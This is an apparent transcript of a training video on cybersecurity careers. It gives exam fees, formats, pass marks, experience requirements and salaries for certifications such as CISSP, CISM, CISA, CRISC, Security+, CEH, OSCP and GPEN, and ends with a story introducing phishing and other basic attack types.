that offer forensic investigation as a service, especially when a corporate gets compromised and they want to conduct their own investigations. The certification provider for this is also EC Council, and the exam fees are $500. This is an advanced level certification, so understanding of applications, networks, and operating systems is a must before you attempt this. The exam is quite similar, 150 questions in 4 hours. Again, it's just a multiple choice question exam. The cutoff again is from 60% to 85% depending on the questions and the weightage of each and every question. Job roles: IT security specialist, network security pro. The job roles: forensic investigators, law enforcement agencies, security specialists, homeland security jobs, and your salaries would be around $88,000 and above. Alright, now let's talk about the managerial level certifications. COBIT stands for Control Objectives for Information and Related Technologies. It's a certification that will give a candidate an in-depth knowledge of the framework which COBIT is all about, and the framework helps you manage and govern enterprise IT environments. Now this is advanced certification, so around 8 years of managerial experience is suggested before you attempt the COBIT 5 certification to understand all the aspects and to help you implement the framework properly. The certification certificate provider is ISACA. The exam fees are around $175. Now this is a small exam, 50 questions, but in 40 minutes. So you really have to be on your toes. You have to know the knowledge. There's very limited time to think, and you have to be fast in your answers. The pass percentage is 50%. The job roles associated with this certification would be to when you apply for information security manager, or as a security consultant, or a cybersecurity manager, and your roles and responsibilities would be to govern the IT space that the organization owns. So all the servers, desktops, the network, the data flows, the databases, everything, and how it needs to be managed and how it needs to be governed in a secure manner. Annual salaries would be around $100,000 plus. Then the CISSP, also called as CISSP. It stands for Certified Information Security Manager, and as the name suggests, it's a security manager certification. It helps the candidate in understanding the relationship between business goals and information security. So now you're going into the space where you're not only technical in nature, but you also have to understand the business needs, the goals of the business, and you have to align the information security of your infrastructure along with the business needs and the business goals. So it is your inputs that are going to go to the management to see if the infrastructure is aligned to the business goals or if the infrastructure or the business goals need any fine-tuning. Around 5 years of work experience is recommended in the information security field for attempting the CISM. Out of the 5 years, the candidate must have a background as an information security manager for 3 years. So you have some experience as a manager, you have implemented those things yourselves, which will give you a better understanding, and then you attempt the certification. Again, providing by ISACA, and the exam fees for ISACA members is $575. For non-members, it is $760. The exam is where you have to answer 150 questions in 4 hours. Quite a bit of time, but questions are going to be scenario-based questions where they're going to give you a lot of scenarios. You have to think about it and you have to give the most probable and the correct answer for that particular scenario. The pass mark is 450 out of 800. Your job profiles would be either a risk manager or a risk consultant, analyzing the business requirements to the infrastructure security that you have, and to identify if there are any risks associated with the infrastructure, highlight those risks, and then put in security controls and manage those controls in a way where security is mitigated. Your average salaries would be around $88,000 and above. Then the CISA or the CISA, the Certified Information Systems Auditor certification. It not only looks into security, but it also looks into auditing and controls in information systems. This is a highly reputed certificate and you gain a better understanding of governance, regulations, and auditing your information landscape. Again, a minimum of 5 years of work experience in the field of information systems, auditing, control, or security is necessary. Now here the question would be, what's the difference? Security is where you're technical in nature, you have done, let's say, a vulnerability assessment or a penetration test, you have implemented firewalls, you have architected security. Controls are all about the security controls that you're going to implement, like firewalls, IDSS, IPSS, data loss prevention systems, maybe even UTMs and whatnot. So experience in architecting or implementing those controls in an effective manner, mitigating your security or your vulnerabilities that you have identified in the organization. And auditing would basically mean about looking at compliance to ensure that everything is in place, you're compliant with, let's say, ISO 27001 guidelines or the policies that you have created yourself, and everything is working in order. So it's more of a checklist where you're going to just check everything is in place and you're conforming to standards. This certification is also provided by ISACA, and the exam fees for ISACA members are $575, whereas non-ISACA members will have to pay $760 for the certification. 150 questions again in 4 hours, multiple choice questions, scenario based. So you have to really understand this real world scenarios of what controls and what audit mechanisms should be in place. Pass mark is 450 out of 800. Your job roles would be mainly becoming an auditor or a senior auditor, a director for information security, information audit manager, or an information technology consultant, where you provide intelligence on how the company should implement their infrastructure. Average salaries would be $103,000 and above. Then comes the CRISC, also called as CRISC, Certified in Risk and Information Systems Control. Certification helps the candidate design and maintain information systems controls for an organization. This is one of the most sought after certifications as far as risk management is concerned. In Europe and in US, if you have this kind of certifications, you automatically qualify for a risk manager or a security risk manager or a information security consultant kind of a role. You should have a minimum of 3 years of experience in the field of IS controls. That means information security controls. You should have knowledge about firewalls. You should know about how to mitigate risks, how to identify risks in the first place, risk analysis, risk management, and after which you're going to implement security controls to mitigate that risk or bring it to acceptable levels. At this point in time, you will also be responsible to create policies revolving those risks and how you want to calculate those risks and treat those risks in their lifetime. Certificate provider again is ISACA, $575 for ISACA members, $760 for non-ISACA members for the exam fees. A similar question, 150 questions to be answered in 4 hours, multiple choice based on performances. So they may give you a scenario where you have to perform a risk analysis and provide a report and a solution based on your findings. Again, the pass mark is 450 out of 800. The job profiles associated, as discussed earlier, are the IT risk management professionals, where they're going to identify risks, treat those risks, calculate, analyze, maybe do a business impact analysis to ascertain how the organization is going to be affected. And then you will also be looking at compliances as far as these job roles are concerned. Average annual salary would be 119,000 and above. Moving on to advanced level certification. Now, this is where we come across the CISSP or the CISSP certification, Certified Information Systems Security Professional. This is the gold standard of all certifications. If you have this certificate, you can basically be assured of a job in the IT world. Now, just to qualify, you'll have to have 5 years of experience in the information security field. There are 8 domains that are specified by CISSP, and you have to prove that you have knowledge and you have work experience of around 5 years in at least 2 of those domains. If you do not have those kind of experiences, you can still attempt the exam, but you become an associate of ISC Square, which means that you get 6 years to accomplish the 5 years of experience requirement for this certification. Before taking up the CISSP certification, it is suggested that the candidate clears all the intermediate level certifications. Not all, but some of them. In fact, I have seen people do the other way around. They qualify for CISSP, they give the exam. Once you're CISSP, the CISA or CISM, CISE or CISM exams are way easier to crack. But you need to have that kind of experience. I have seen people with 15 years of experience and more fail at this certification in the first attempt. The certificate provider is ISC Square. The exam fees is $699. Like I said, this certification is most sought after, the gold standard. In fact, there is hardly any other certifications after this that you might want to do. The questions, now the exam has changed. If it is the English version that you're giving, it's 150 questions to be answered in 3 hours. If it is the non-English exam that you're attempting, then it is 250 questions in 6 hours. It's a marathon, and if you're opting for the 6-hour exam, you need to plan it really well. It sounds really easy, but the questions are quite tough. They're scenario based and the answers are quite confusing as well. You would get multiple choice questions, you would get drag and drop, and you might get simulators as well. The pass mark is 700 out of 1000, but each question has a different weightage. So it depends on which questions are asked of you and which questions you have answered correctly. The job roles associated with this certification would be anything and everything in information security at the managerial level and above. So information security manager, risk manager, information system security officer, the CISO role, the CISO, chief information security officer. Any role that you might think of as a risk from a risk compliance strategy could be achievable after this kind of a certification. The average annual salary is $108,000 for this certification.
First, let me briefly introduce CompTIA before moving on to the CompTIA Security Plus certification. The Computing Technology Industry Association, or better known as CompTIA, is a leading vendor-neutral IT certification provider in the world. CompTIA is considered one of the top trade associations. Its vendor-neutral certification program is undoubtedly one of the best in the IT industry. For more than 2 decades, CompTIA has developed certification exams and training for networking, security, open source development, and cloud, to name a few. CompTIA certifications continue to address the requirements and necessities of today's technology challenges. CompTIA certifications are grouped by skill set. Presently, CompTIA certifications are classified into 4 areas: core, infrastructure, cybersecurity, and additional professional certifications. If you have a job that may involve some sort of certification, you must consider obtaining that certification. Certifications are very crucial. CompTIA certifications are a way for IT professionals to demonstrate their knowledge of computers. Let us now have a look at a few of the certifications offered by CompTIA. First, we have CompTIA A+. CompTIA A+ certification is an entry-level certification for IT technicians. This certification is designed for employees who are seeking a career as a support, service center, or networking technician. This certification tests a candidate's understanding of basic networking, troubleshooting, and security skills. It covers laptop and PC hardware, software installation, and configuration of operating systems. According to CompTIA, more than 1 million IT professionals hold the A+ certification. Next, we have CompTIA Network Plus. You can either start with the A+ certification. However, if you have the experience, you can move directly to the CompTIA Network Plus certification. This certification is for professionals who carry a minimum of 9 months of networking experience. Here, a candidate must be familiar with networking technologies, topologies, security installation and configuration, and troubleshooting of wireless and wired network devices. Next, we have CompTIA Security Plus. CompTIA Security Plus covers network security concepts, threats and vulnerabilities, access control, identity management, cryptography, and much more. We will closely look at the CompTIA Security Plus certification in this video. And finally, there's CompTIA Cloud Plus. The CompTIA Cloud Plus certification finds its importance as the cloud computing market continues to grow by leaps and bounds. This certification targets IT professionals with 2 to 3 years of experience in storage, networking, or data center administration. The certification exam tests the candidate's knowledge of cloud technologies, cloud markets, and hybrid and multi-cloud solutions. Those were a few of the certifications offered by CompTIA. There are several other certifications like CompTIA Linux Plus, CompTIA Pentest Plus, and CompTIA Project Plus, to name a few. Now let us have a look at the CompTIA Security Plus certification in detail. So what is the CompTIA Security Plus certification? Well, the CompTIA Security Plus certification is a leading entry-level IT certification. It is an essential certification for professionals working in the IT industry. It is one of the first security certifications that must be earned by IT professionals. It provides the core knowledge required of any cybersecurity role and provides a springboard to various intermediate-level cybersecurity jobs. This certification teaches you how to secure applications, devices, and networks. It also focuses on hands-on practical skills in the field of network security. This certification teaches you skills from spotting and mitigating risks to troubleshooting security incidents. It is to be noted that IT professionals with CompTIA Security Plus know how to address security incidents and not just identify them. So now that you know what CompTIA Security Plus certification is about, let us look at a few points as to why a professional must choose this certification. The first reason being it's a vendor-neutral certification. The CompTIA Security Plus certification is vendor-neutral, which implies that you don't have to center on technology and security of a precise vendor. The skills and knowledge achieved through this certification make security professionals and network administrators become in demand in the IT marketplace. The CompTIA Security Plus certification is globally acknowledged to be one of the fundamental security certifications in the field of cybersecurity. CompTIA Security Plus certification is universally recognized and trusted across the world. Security Plus provides hands-on skills, one of the few entry-level cybersecurity certifications that emphasizes on hands-on practical skills. This ensures a security professional is better prepared to solve several complex issues of the current times. The CompTIA Security Plus certification is aligned with the latest techniques and trends. It covers core technical skills in risk assessment and management, incident response, forensics, and cloud operations, to name a few, thereby ensuring high performance on the job. Having this security certification provides you a wider breadth of career opportunities. The CompTIA Security Plus exam is performance-based, which makes the knowledge and skills learned more applicable. There are numerous job roles that turn to Security Plus to supplement baseline cybersecurity skills. Cybersecurity professionals are in demand by organizations from both private and public areas. With this certification, you can take up jobs related to compliance and operational security, threats and vulnerabilities, access control and identity management, and cryptography, to name a few. It is to be also noted that professionals with the Security Plus certification have greater opportunities of receiving higher salaries than non-certified professionals. Another benefit of this certification is that if you wish to get a cybersecurity government job, obtaining the CompTIA Security Plus certification will be an ideal starting point for you. So now that you know the perks of achieving this certification, what do you have to do to achieve this? Well, before you can achieve this certification, you have to clear the CompTIA Security Plus exam. Let us now have an overview of the CompTIA Security Plus exam. First and foremost, who can take up this exam? Although CompTIA does not have any set prerequisites, organizations recommend that candidates meet these two criteria. Let's have a look at the two criteria. Firstly, the CompTIA Security Plus is for IT professionals who carry a minimum of 2 years of experience in the IT administration, focusing on security. The CompTIA Security Plus is ideal for professionals who are looking to start or advance a career in security. Obtaining this certification prepares the professionals for job roles like System Administrator, Security Administrator, Network Administrator, Junior Penetration Tester, Security Engineer, and Security Consultant, to name a few. Though CompTIA Security Plus is an entry-level certification, it is strongly recommended that you get the A+ and Network Plus credentials before proceeding to the Security Plus certification. This will ensure that you have the required technical skills like configuring, managing, and troubleshooting networks. Now let's move on and understand the CompTIA Security Plus exam details. CompTIA Security Plus SY0601 is the latest exam code that was launched on 12th November 2020. The SY0501 English language exam retires on 31st July 2021. Hence, we recommend you to opt for the SY0601 exam. There are a maximum of 90 questions. CompTIA Security Plus exam has multiple choice questions, but some CompTIA certification exams include performance-based questions or PBQs. Performance-based questions test a candidate's ability to solve problems in a simulated environment. The passing score for this certification exam is 750 on a scale of 100 to 900. The duration of the exam is 90 minutes, so time management is crucial to clear the exam since you need to solve each question within a minute. CompTIA Security Plus SY0601 exam is currently available in English and Japanese language. You can enroll for the exam by booking a slot online or registering with Pearson VUE testing centers. The price of the CompTIA Security Plus certification exam is $370 US. In Australia, the price is $500 and in European currency, it is €334. Let us now look at the focus areas of CompTIA Security Plus exam. Firstly, this exam focuses on the core cybersecurity skills required of any cybersecurity role, such as security incident handling and response, intrusion detection, malware prevention, etc. The second area of focus is threats, attacks, and vulnerabilities. This includes analyzing indicators of compromise and determining types of malware or comparing and contrasting types of attacks. Next up, we have identity and access management. This topic emphasizes on implementing identity and access management controls or differentiating common account management practices. The fourth domain that CompTIA Security Plus focuses on is risk management. This domain describes the importance of policies, plans, and procedures related to organizational security. Finally, we have cryptography and PKI. Here, the exam deals with questions related to comparing and contrasting basic concepts of cryptography and implementing public key infrastructure. Another key focus area of this exam is how to troubleshoot common security issues and deploy mobile devices securely. Now, coming to the final section of this video where we look at the important skills that you will acquire after completing the CompTIA Security Plus certification exam. First, you will learn to detect various types of compromise and understand penetration testing and vulnerability scanning concepts. This certification will give knowledge to assess the security posture of an enterprise network and recommend and implement appropriate security solutions. You will also get an idea of installing, configuring, and deploying network components while assessing and troubleshooting issues to support organizational security. You will gain the desired skills to monitor and secure hybrid environments including cloud, mobile, and IoT. CompTIA Security Plus certification exams give the experience to install and configure identity and access services. You will understand how to identify, analyze, and respond to security events and incidents. Finally, you will grab another crucial skill, that is to implement best practices on risk management. CompTIA Security Plus certification will make you understand how to implement and summarize risk management best practices and the business impact. It ensures you operate with an awareness of applicable laws and policies, including the principles of governance, risk, and compliance. That was all about the CompTIA Security Plus exam. Taking up this exam will help you learn a lot about cybersecurity and acquire the necessary skills that will help you become a greater cybersecurity professional. This is why organizations look for professionals with CompTIA certification. This certification is evidence of your expertise in the security field. CompTIA Security Plus certification is prevalent among security professionals. Although the exam requires a lot of hard work to crack, the reward is very fruitful. All the best to everyone who wishes to be CompTIA Security Plus certified. Let us understand the importance of the CEH certification before getting to know about its content. So why should you take up the CEH version 11? The Certified Ethical Hacker is the most trusted ethical hacking certification and a recommended one by employers around the globe. Since the introduction of the CEH certification in 2003, it is globally recognized as a standard within the information security field. The CEH version 11 by EC Council continues to keep up to the standard, and it familiarizes the latest hacking techniques and teaches you advanced hacking tools and exploits used. The CEH version 11 aligns with the current cybersecurity market requirements and adds the latest advancements in the cybersecurity field. The CEH certification helps and trains you to think like a hacker, and this in turn helps you beat a hacker and defend your network. After obtaining the CEH certification, you'll be a certified ethical hacker. A certified ethical hacker is a skilled professional working in a red team environment who safeguards networks and understands attack strategies and mimics the skills of malicious hackers. Certified ethical hackers discover vulnerabilities in a system and operate with permission from the system owners only. So who can become a certified ethical hacker and who can take up the CEH certification? Let us have a look at that now. In the first case, to be eligible for the CEH certification exam, you need to attend the official training from authorized EC Council training partners. It can be an online training or tutor-led training from EC Council learning partners. Only then are you eligible to take up the CEH certification exam. So a candidate who has completed an official EC Council training is eligible to take up the exam without going through the application process. Or in the second case, in order to be considered for this credential, you need to have at least 2 years of work experience in the information security domain, and you must pay a non-refundable application fee and submit an eligibility application form. Once it is approved, you can take up the CEH exam. After the application is approved, you can purchase the test voucher. In the latest version of the CEH, we will see the addition of various core concepts. Moving on to our next topic, let us see how different the CEH version 11 is and few of its objectives. Firstly, it outlines ethical hacking concepts, cyber kill chain concepts, an overview of information security, and various laws and regulations related to information security. This certification briefs you about the phases of system hacking, attacking techniques, and how you can maintain access. It also briefs you about footprinting concepts and ways of utilizing footprinting tools along with necessary countermeasures. The next objective is to familiarize with vulnerability assessment along with a hands-on experience of various scanning tools. Next, we have cybersecurity threats like malware threats, analysis of various worms, viruses, and trojans. Various malware concepts, packet sniffing concepts, and techniques have been introduced into this domain. It also highlights the concepts related to social engineering, denial of service attacks, SQL injection, and evasion techniques. It also speaks about wireless hacking concepts and mobile device management. The concept of operational technology is a new addition this time. Next is getting acquainted with security solutions like firewalls, honeypots, IPS, their evasion, and protection. Our fifth point is knowing various topics in cryptography like encryption algorithms, public key infrastructure, and cryptanalysis. Moving on, the next objective is to incorporate Parrot Security OS as it offers better performance on lower powered laptops and machines when compared to Kali Linux. Next is to learn to recognize and deal with IoT-based vulnerabilities and attacks with the CEH version 11 course that covers the latest IoT hacking tools. You would be required to ensure the safety of IoT devices. Our next point is with respect to the evolving cloud industry. You would need to learn how to identify and defend cloud-based threats and attacks. The latest version of CEH includes new operating systems and Windows 10 configured with domain controller and vulnerable web applications for improving hacking skills. Finally, what is different is that more than 50% of the CH version 11 course is dedicated to practical skills in live ranges via EC Council labs. EC Council leads in this aspect of the industry. Now that we saw the CH exam objectives, let us look into the CEH exam topics weightage. As you see on your screens, this is a pie chart with 9 domains in CH along with their weightages. You can prepare for your exam accordingly. Let us move on and take a closer look at each of these domains, their respective subdomains and their descriptions. Our first domain is Information Security and Ethical Hacking Overview. This domain consists of questions from information security, cyber kill chain concepts, ethical hacking concepts, various hacking concepts, and information security laws and standards. You can expect a total number of 8 questions from this domain. The weightage of this section is 6%. The second domain is Reconnaissance Techniques. Under the subdomains, we have footprinting and reconnaissance at first. This covers various topics like footprinting concepts, footprinting methodology, email footprinting, footprinting through web services, DNS footprinting, footprinting through social engineering, etc. The next subdomain in this section is Scanning Networks. Scanning networks covers various concepts like scanning tools, host discovery, port and service discovery, OS discovery, draw network diagrams, scanning beyond IDS, firewall, etc. And our third subdomain under reconnaissance techniques is enumeration. Various topics like SNMP enumeration, NTP and NFS enumeration, SMTP and DNS enumeration, and enumeration countermeasures are covered under this subdomain. A total of 26 questions will be asked from this domain. Under footprinting and reconnaissance, you will have 10 questions, and under scanning networks, another 10, and finally under enumeration, you will have 6 questions. A total weightage of 21% is given to this particular topic. Our third domain is System Hacking Phases and Attack Techniques. Under our third domain, our first subdomain is about vulnerability analysis. This subdomain covers topics on vulnerability assessment, vulnerability classification, vulnerability assessment solutions and tools, and various vulnerability assessment reports. Our next subdomain is about system hacking. You have concepts like gaining access, cracking passwords, vulnerability exploitation, escalating privileges, maintaining access covered under this subdomain. And finally, we have malware threats under this domain. Malware threats incorporate concepts like APT concepts, Trojan concepts, virus and worm concepts, malware analysis, and so on. A total of 21 questions will be asked from this domain. Under vulnerability analysis, there will be 9 questions asked, system hacking another 6 questions, and finally under malware threats, you will have 6 other questions asked. That sums up to a total 21 with a weightage of 17% for this domain. Our fourth domain is about network and perimeter hacking. Here you have various subdomains and one of it is social engineering. Under social engineering, you will be asked questions based on social engineering techniques, insider threats, impersonation on social, networking sites, identity theft, and so on. You'll also have various questions on the sniffing concepts as it is another subdomain. You can also expect questions from the denial of service subdomain. Here, questions related to botnets and DDoS attacks will be asked. Various session hijacking concepts are another crucial part of this domain. The final subdomain is about evading IDS, firewalls, and honeypots. Here, various concepts on IDS, IPS, firewall, and honeypots are covered. You will need to understand how to evade IDS and firewalls and how to detect honeypots. A total number of 18 questions will be asked from the fourth domain, that is network and perimeter hacking, and the weightage for this domain is 14%. Our fifth domain is about web application hacking, and our first subdomain in it is hacking web servers. This incorporates concepts related to web server attacks, web server attack tools, patch management, and so on. The next subdomain is about hacking web applications. Here you have various concepts related to bypass client-side controls, analyze web applications, footprint web infrastructure, attack access controls, and how to perform injection attacks, and so on. Finally, under the SQL injection subdomain, you will have questions based on SQL injection, the types of SQL injection, the SQL injection methodology, SQL injection tools, evasion techniques, and SQL injection countermeasures. Here, a total of 20 questions will be asked from this domain. And that is, a weightage of 16% will be given to the web application hacking domain. Our sixth domain is solely devoted to wireless network hacking. This domain focuses on hacking wireless networks, various wireless concepts, wireless encryption, wireless threats, wireless hacking tools, various hacking methodologies, Bluetooth hacking, and wireless countermeasures are covered. A total of 8 questions will be asked from this domain with a weightage of 6%. Our seventh domain is all about mobile platform IoT and OT hacking. Our first subdomain here is hacking mobile platforms. Here, the concepts that are touched upon are mobile platform attack vectors, hacking Android OS, hacking iOS, mobile device management, and mobile security guidelines and tools. Our next subdomain here is about IoT and OT hacking, which covers concepts on IoT hacking tools, its methodologies, countermeasures, and it also speaks about OT concepts, OT attacks, OT hacking tools, and OT countermeasures. You have a total of 10 questions asked from this domain with a weightage of 8%. The next domain is very interesting and it is all related to cloud. The cloud computing domain covers concepts based on cloud computing, serverless computing, cloud computing threats, cloud hacking, and cloud security. The weightage given to this domain is 6% with a total number of questions of 7. And finally, we have cryptography as our ninth domain. As the name suggests, this domain covers topics based on cryptography concepts, encryption algorithms, cryptography tools, public key infrastructure, email encryption, disk encryption, cryptanalysis, and countermeasures. And 7 questions will be asked from this domain with a weightage of 6%. Now that you saw the CEH exam topics weightage, let us have a closer look at the CEH exam details. Let us first have a look at the CEH exam based on MCQs. The exam title is Certified Ethical Hacker with the exam code of 312-50. This exam will have 125 questions with a time limit of 4 hours. The test format is multiple choice questions. The pass percentage varies ideally between 60% to 85%. Now let's have a look at the CEH practical exam details. In order to gain the CEH master recognition, it is mandatory that you take up the CEH practical exam as well. The exam title is Certified Ethical Hacker Practical, and this practical exam will have 20 questions with a duration of 6 hours. The exam format will be iLab Cyber Range, and finally the passing score for the CEH practical exam is at 70%. After clearing both the MCQ-based exam and the practical exam, you can get the CEH master recognition. Now that we had a look at the CEH exam details, let us have a look at the career prospects for a professional with this certification. Having the CEH certification guarantees that you have an insight into the hacking world. Hence, companies want to hire professionals who can think like a hacker and safeguard their networks and systems. A candidate with the CEH certification can apply for various cybersecurity job roles such as penetration tester, security engineer, and information security analyst from the long list. According to PayScale, the annual average salary of a CEH professional in India is Rs 5 lakhs per annum. Meanwhile, in the United States, a professional holding the CEH certification earns nearly $93,000 on an average basis annually. Now that you had a look at the CEH version 11 certification and its career prospects, what are you waiting for? Get certified with Simplilearn and bag that CEH certification.
So let's start looking at the certifications. So to be an ethical hacker, you must hold a certification which specializes in ethical hacking or in cybersecurity. Companies look for candidates who are globally certified. When we say globally certified, they're looking for a certificate that has been given by an organization that is recognized globally and is well accepted in the industry. So these are the top 5 certifications a candidate can obtain. The first one, become a certified ethical hacker. Then there is Global Information Assurance Certification Penetration Tester. Then Offensive Security Certified Professional, CompTIA Pen Test Plus. And finally, the Licensed Penetration Tester. Now, these certifications are offered by different organizations. All of these organizations are recognized globally and their certifications are well accepted in the technical space. So let's start off with the Certified Ethical Hacker and we'll look at the organizations that provide these certifications and how we can attain them. So CEH or Certified Ethical Hacker in its current form is in its version 10. It's been revised and updated over a period of time. EC Council is the certifying authority for CEH. They have their own authorized training centers through which you can attend trainings, give those exams, get yourself certified, and thus become globally certified and can be eligible to apply for security related jobs. It is a very well-known certification and is widely accepted at the same time. It would test the candidate's knowledge of security threats and preventive measures. Now, there are two types of exams that you can give with CEH. One is a multiple choice question exam, which is theoretical in nature. They ask you questions and you answer the correct one. You select the correct answers. If you clear, you get certified. The second certification nowadays is where there's a practical exam associated with it. That's you'll have to purchase the voucher for that exam and give that exam. The practical exam is held in a virtual lab where you're given scenarios, and based on those scenarios, you have to resolve the questions given to you and give proof of the resolution, which would then get you certified as an ethical hacker. The theoretical exam in this scenario is the fees is around $500. This is for the multiple choice question exam where you can pay the fees and you can attend through a online portal and you can give the exam directly. The exam is 4 hours long, in which you have to answer 125 questions. Now 4 hours for 125 questions seems a long time, but it isn't. It's a very technical exam. There are scenario based questions and it would take some time for you to analyze and understand the question and then identify the equivalent correct answer. So it's a very competitive exam and you'll have to study really hard to clear this exam as well. The cutoff for passing varies from 60 to 85%. So there is no exact grade and all the questions have different weightages. So depending on the questions that have been given to you and the way that you have answered them, you would pass at either 60% or you would pass when you have scored 85%. Once you are CEH certified, which is a very technical certification, you will be qualified to apply for job roles as a penetration tester or a security engineer. These are job roles where you would be responsible of ethically trying to attack applications, servers, switches, and try to find out vulnerabilities within them. The training of this certification will make you adept in most of these tools that are required. There are a lot of practicals in this trainings, and if you successfully completed those practicals, clearing the exam is a easy task. With the practicals comes your knowledge and would help you understand how you would be performing penetration tests in the real world. An average annual salary in the USA for a CEH certified person is around $91,000 and in India is around 4,76,000 odd rupees. The salaries would vary as far as organizations are concerned. More established organizations can afford to pay a little bit more, but these are average salaries that we have seen across the market. The next certification is the GPEN, also known as the Global Information Assurance Certification Penetration Tester. This certification looks into the different pen testing practices and methods, also focuses on the various problems and pen testing. So again, this is where you're getting certified as a penetration tester. So it's again a technical certification where your knowledge on networking, applications, and security of which will be tested. You will be trained on this, of course. So the training will include all these areas where you need to focus, identify those problems, and thus be ready for the real world scenarios. The candidate will have to understand networking concepts and operating systems such as Linux and Windows, and you should be very well aware of the TCP/IP protocols. This is true for any of the technical certifications for ethical hacking. GIAC is the certification provider. It's again a very well-renowned and well-accepted certification authority across the globe. The exam fees are $1,899. 82 to 115 questions to be answered in 3 hours. Now, why 82 to 115? It depends on the test that has been associated, and depending on how you're answering those questions, you would be given those many number of questions to begin with. But all of these need to be answered in 3 hours. 74% is the pass percentage that is required to clear this exam. The average annual salary in the USA is around $96,000, while in India it is around similar to certified ethical hacking. Then looking at the next certification from Offensive Security called the OSCP, Offensive Security Certified Professional. This is another penetration testing certification, highly technical in nature, and it is an entirely hands-on certification. The previous two certifications that we saw, we talked about CEH, where there are two different exams. You could either take the theoretical exam and give your MCQs, or you could take the practical one. Here you don't have an option. This is a practical exam. So the test is conducted on a virtual network. So they send out instructions to you. There's a virtual lab that is given out to you, and they give you the questions, and you have to perform those assessments, create those reports, and provide it to the certifying authority, in this case Offensive Security. If you match their criteria of whatever you have identified in those reports, you get certified. Here, the requirements of good understanding of networking protocols, how systems function, how Kali Linux operating system functions, and the candidate must complete Offensive Security's penetration testing with the Kali Linux course and pass the hands-on exam. So this focuses purely on Kali Linux. Kali Linux is an operating system that is freely distributed over the internet and comes structured with around 300 plus tools used for ethical hacking. So this course totally relies on Kali Linux for you to use as a tool set for penetration testing. The certificate provider, as stated, is Offensive Security. The name of the course is OSCP, Offensive Security Certified Professional. Exam is around $800 to $1,550. Now understand that this exam is technical and is hands-on. So for you to prepare for this exam, they come up with virtual labs where you can start practicing and honing your skills. Depending on the number of days for which you have purchased the access to that particular labs, the amount will vary from $800, which would be the minimum access days available, to $1,550, where the maximum number of days would be given to you for practicing. Once you're ready, even during the time span of where you have that access, once you're ready for the exam, you can attempt the exam and clear. The average annual salary is similar, around $91,000 for the US market and 905,000 rupees in the Indian market. Then looking at the CompTIA Pen Test Plus. CompTIA is another certification authority or a certification provider, a training provider that will help you get yourself certified in the ethical hacking space. So they have certification called Pen Test Plus, which is focused towards penetration testing. So it is an intermediate level certification. It assesses the vulnerability assessment and the penetration testing skills of a candidate. Here, the training will provide you with all the essentials, where it will help you identify how to do vulnerability assessments, how to identify those vulnerabilities, and then which tools to utilize for what kind of a penetration test. For the requirements, a minimum of 3 to 4 years of hands-on experience in the information security field. Also, a CompTIA Security Plus or a Network Plus or equivalent knowledge is required. So in the Network Plus, they talk about securing networks, and they help you understand the OSI layers, the TCP IP layers, and help you understand the protocols and all of those things. So having that knowledge is an added advantage. The certificate provider is CompTIA, and the cost of the exam is around $349. Maximum number of questions is 85, and I think it's a 3-hour exam. The passing percentage is scoring 750 marks out of a possible 900. So the scale is, the minimum you can ever score is 100. If you're completely unprepared, the maximum you can score is 900. You get a leeway of 150 marks for your certifications. So you have to score a minimum of 750 to clear the exam. Average annual salary for a CompTIA Certified Penetration Test Plus Professional is $97,000 in the US market, and in the Indian market it would be around 5 lakh rupees. Then comes the Licensed Penetration Tester. Now this is an advanced certificate again from EC Council. This is where EC Council gives you a license which certifies that you have undergone thorough training and have cleared your exam, in which you can conduct or lead an audit for vulnerability assessment and penetration testing. It is an expert level certification, comes after the CEH certification. It is the ultimate test which tests this candidate's penetration testing skills. So there are two certifications over here. One is the ECSA, EC Council Certified Security Analyst. Once you clear that, you can appear for the Licensed Penetration Tester. Both of these are hands-on certifications. So you will be given a virtual lab, you will be given a scenario in which you'll have to perform some assessments, create reports, submit it to the EC Council. They will analyze your reports. If they meet the criteria that have been identified, you will then be certified as a licensed penetration tester. The candidate must be above 18 years of age. A recertification is required every 3 years. So the validity is 3 years. After 3 years, you will have to be recertified, or there is a continuing point education system over there where you can score points by publishing articles, by attending trainings or giving out trainings, and you can get yourself recertified. It is preferred that the candidate has CEH and the ECSA certification. So the previous certification that we saw, Certified Ethical Hacker, and then the ECSA, EC Council Certified Security Analyst, after which you can appear for the LPT, Licensed Penetration Tester. The certificate provider again is EC Council. The Licensed Penetration Tester exam has a different process. The candidate must purchase an exam dashboard for $899, which is valid for a year. So once you purchase the voucher, the validity is 1 year. You can prepare within that 1 year and then give the exam and attain the certification. Only once you are ready, the exam can be scheduled and you can give that exam. The exam consists of 3 different levels. Each level has 3 different challenges. The candidate must pass at least 1 challenge in order to qualify for the next level. And for each level, the exam is 6 hours. So this is a grueling exam. This is hands-on. They're giving you challenges and they are going to test you on your skills as a penetration tester. So be ready to be very hands-on for this kind of a certification. Average annual salary in the US is around $100,000 and above, and in India, $825,000 and above.
Meet Anne. She often shops from www.shoppingcart.com. She has her information like email ID, address, and credit card details saved on the website to enable a faster and hassle-free shopping experience. The required information is stored in a server. One day, Anne received an email which stated her eligibility for a special discount voucher from shoppingcart.com. In order to receive the coupon code, she was asked to fill in her shoppingcart.com account credentials. This didn't seem fishy to her at the time, as she thought it was just an account verification step. Little did she realize the danger she would be facing. She was knocked off her feet when a substantial amount of money was wiped off her account. How do you think this happened? Well, yes, the email she received was fake. Anne's shoppingcart.com account witnessed unauthorized access from a third party. This type of attack is known as a cyberattack, and the person who carries it out is called a hacker. Could Anne have prevented this attack? Indeed, she could have, with the help of cybersecurity. Cybersecurity involves techniques that help in securing various digital components, networks, data, and computer systems from unauthorized digital access. There are multiple ways to implement cybersecurity, depending on the kind of network you are connected to and the type of cyber attacks you are prone to. So, let's take a look at the various cyber attacks that Anne could have been exposed to. One of the most common types of cyber attacks is a malware attack like Trojan, adware, and spyware, to name a few. Had Anne downloaded any suspicious attachments online, her system could have gotten corrupted by certain malicious viruses embedded within the attachments. Next is a phishing attack, the type of cyber attack which Anne experienced. Here, the hacker usually sends fraudulent emails, which appear to be coming from a legitimate source. This is done to install malware or to steal sensitive data like credit card information and login credentials. Another type of attack is the man-in-the-middle attack. Here, the hacker gains access to the information path between Anne's device and the website's server. The hacker's computer takes over Anne's IP address. By doing so, the communication line between Anne and the website is secretly intercepted. This commonly happens with unsecured Wi-Fi networks and also through malware. Password attack is one of the easiest ways to hack a system. Here, Anne's password could have been cracked by using either common passwords or trying all possible alphabetical combinations. To prevent future cyber attacks, Anne sought to implement a few cybersecurity practices. First, she installed a firewall. As the name suggests, it is a virtual wall between Anne's computer and the internet. Firewalls filter the incoming and outgoing traffic from your device to safeguard your network, and they can either be software applications or hardware reinforcements. Secondly, Anne implemented honeypots. Just like how flowers 